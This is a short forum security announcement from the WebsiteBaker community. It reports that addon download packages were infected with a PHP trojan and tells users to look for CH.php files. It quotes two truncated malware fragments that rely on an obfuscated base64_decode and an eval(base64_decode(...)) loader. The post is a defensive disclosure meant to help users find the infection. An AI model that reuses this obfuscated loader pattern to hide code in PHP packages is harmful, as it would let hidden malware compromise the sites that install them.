WebsiteBaker Community Forum
WebsiteBaker => Security Announcements => Topic started by: DarkViper on January 17, 2014, 04:02:20 PM
-
Sorry, unfortunately we must deactivate our addon section (addon.WebsiteBaker. org) for a short time.
Some of the download packets are infected by a PHP virus/trojan.
Already we work on to solve this problem and we will inform you as soon as the downloadarea is opened again.
If you downloaded a packet between the 27th Dec and today, please check that download for invalid files named CH.php in any language folder and suspicious code in other files.
Examples of malware code you should search for are:
<?php
// first Version
$g___g_='base'.(32*2).'_de'.'code';$g___g_=$g___g_(str_replace("\n", '', 'E7BstEFmF0mWo7bWiJpZiSncg4cJwxGvG6TREJxxDwgGU9xIJsbHISO8VswX71OY7SunXTsz37hHfhHB
nrjFFHG8nJ/PCbYaLRGtQrnqa/GFo2Ze2M2ANGO/HsLXxi8rEQBh3AvF/Fb96KIRTcEdNq3qyTIGloRb.....';
// second version
$wbs = "JHZpc2l0YyA9ICRf ... wkdmlzaXRjKTss=";
eval(base64_decode($wbs));